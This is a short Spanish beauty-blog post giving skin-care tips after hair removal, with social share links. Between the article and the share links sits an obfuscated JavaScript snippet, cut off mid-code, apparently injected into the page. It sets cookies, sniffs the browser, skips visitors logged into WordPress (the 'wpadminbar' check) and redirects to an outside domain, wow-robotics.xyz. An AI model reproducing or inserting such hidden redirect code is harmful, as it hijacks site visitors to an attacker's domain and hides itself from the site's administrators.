Después de la depilación, tu piel tiende a resecarse y perder elasticidad. Lo mejor es empezar por hidratar la piel de forma rápida y sencilla, siendo constante, ya que no obtendrás resultados si sólo lo haces de vez en cuando.

Hay formas de depilación bastante agresivas que consiguen que nuestra piel se vuelva sensible y con rojeces y en ocasiones hasta pequeños granitos o descamaciones. Para evitar esto, utiliza una suave loción hidratante que no contenga alcohol. Los días posteriores a la depilación intenta  no exponerte al sol o a temperaturas extremas, ya que la piel está sensible.

Antes y después de la depilación es aconsejable lavar las piernas con un suave jabón y agua tibia, ya que conseguirás ablandar el pelo. Y entre depilación y depilación hacer una exfoliación una vez a la semana aproximadamente. De esta manera, evitarás la aparición de posibles pelos enquistados, puntos rojos o grietas que harán perder la belleza de tus piernas.

¡Así proporcionarás a tu piel toda la suavidad y el confort que necesita!

  var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone